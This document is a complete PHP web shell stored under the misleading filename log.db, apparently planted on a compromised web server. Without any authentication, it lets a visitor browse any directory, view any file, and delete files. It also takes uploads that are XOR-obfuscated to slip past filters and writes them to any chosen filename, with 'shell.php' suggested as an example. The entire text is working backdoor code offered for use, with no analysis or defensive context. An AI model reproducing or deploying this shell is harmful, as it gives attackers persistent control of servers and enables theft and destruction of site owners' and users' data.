Edit File: log.db
<?php @ini_set('display_errors', 0); @error_reporting(0); // Secret key (must match the one used in JavaScript) $key = "myXorSecret"; // XOR decryption function function xor_decrypt($data, $key) { $out = ''; for ($i = 0, $len = strlen($data); $i < $len; $i++) { $out .= $data[$i] ^ $key[$i % strlen($key)]; } return $out; } // Handle encrypted file upload if (isset($_POST['b64data']) && isset($_POST['fn'])) { $b64 = $_POST['b64data']; $filename = basename($_POST['fn']); $raw = base64_decode($b64); $decrypted = xor_decrypt($raw, $key); if (file_put_contents($filename, $decrypted)) { echo "File '$filename' uploaded and decrypted successfully."; } else { echo "Failed to write file."; } exit; } // Handle file deletion if (isset($_GET['delete'])) { $deletePath = $_GET['delete']; if (is_file($deletePath)) { if (@unlink($deletePath)) { echo "<p style='color:green;'>File '" . htmlspecialchars($deletePath) . "' deleted successfully.</p>"; } else { echo "<p style='color:red;'>Failed to delete file '" . htmlspecialchars($deletePath) . "'.</p>"; } } } // Directory listing $dir = isset($_GET['d']) ? $_GET['d'] : getcwd(); $files = scandir($dir); function esc($s) { return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8'); } ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>PHP Shell - Encrypted Uploader with Deletion</title> <style> body { font-family: monospace; background: #f4f4f4; padding: 20px; } table { border-collapse: collapse; width: 100%; margin-top: 10px; } th, td { padding: 6px; border: 1px solid #ccc; } th { background: #eee; } input[type="text"] { width: 300px; } a.button { padding: 2px 6px; background: #ccc; text-decoration: none; border-radius: 4px; margin-right: 5px; } a.button:hover { background: #999; color: white; } </style> </head> <body> <h2>Directory: <?= esc($dir) ?></h2> <p> <a href="?d=<?= esc(dirname($dir)) ?>">Go to Parent Directory</a> </p> <table> <thead> <tr><th>Name</th><th>Type</th><th>Action</th></tr> </thead> <tbody> <?php foreach ($files as $f): if ($f === '.') continue; $path = realpath($dir . DIRECTORY_SEPARATOR . $f); $type = is_dir($path) ? 'DIR' : 'FILE'; ?> <tr> <td><?= esc($f) ?></td> <td><?= $type ?></td> <td> <?php if ($type === 'DIR'): ?> <a class="button" href="?d=<?= esc($path) ?>">Open</a> <?php else: ?> <a class="button" href="?view=<?= esc($path) ?>">View</a> <a class="button" href="?d=<?= esc($dir) ?>&delete=<?= esc($path) ?>" onclick="return confirm('Delete this file?')">Delete</a> <?php endif; ?> </td> </tr> <?php endforeach; ?> </tbody> </table> <?php // File viewer if (isset($_GET['view']) && is_file($_GET['view'])): $path = $_GET['view']; $content = @file_get_contents($path); ?> <h3>File: <?= esc($path) ?></h3> <pre><?= esc($content) ?></pre> <?php endif; ?> <h3>Upload Encrypted File</h3> <input type="file" id="file"><br><br> <input type="text" id="filename" placeholder="Remote filename (e.g. shell.php)"><br><br> <button onclick="upload()">Upload</button> <pre id="log" style="background:#eee; padding:10px; margin-top:10px;"></pre> <script> const key = "myXorSecret"; function xorEncryptBuffer(buffer, key) { const out = new Uint8Array(buffer.byteLength); const keyBytes = new TextEncoder().encode(key); for (let i = 0; i < buffer.byteLength; i++) { out[i] = buffer[i] ^ keyBytes[i % keyBytes.length]; } return out; } function upload() { const fileInput = document.getElementById("file"); const filenameInput = document.getElementById("filename"); const file = fileInput.files[0]; const fn = filenameInput.value.trim(); if (!file || !fn) return alert("Please select a file and enter a filename."); const reader = new FileReader(); reader.onload = function(e) { const buffer = new Uint8Array(e.target.result); const encrypted = xorEncryptBuffer(buffer, key); const b64 = btoa(String.fromCharCode(...encrypted)); fetch("", { method: "POST", headers: { "Content-Type": "application/x-www-form-urlencoded" }, body: "b64data=" + encodeURIComponent(b64) + "&fn=" + encodeURIComponent(fn) }).then(res => res.text()).then(t => { document.getElementById("log").innerText = t; }); }; reader.readAsArrayBuffer(file); } </script> </body> </html>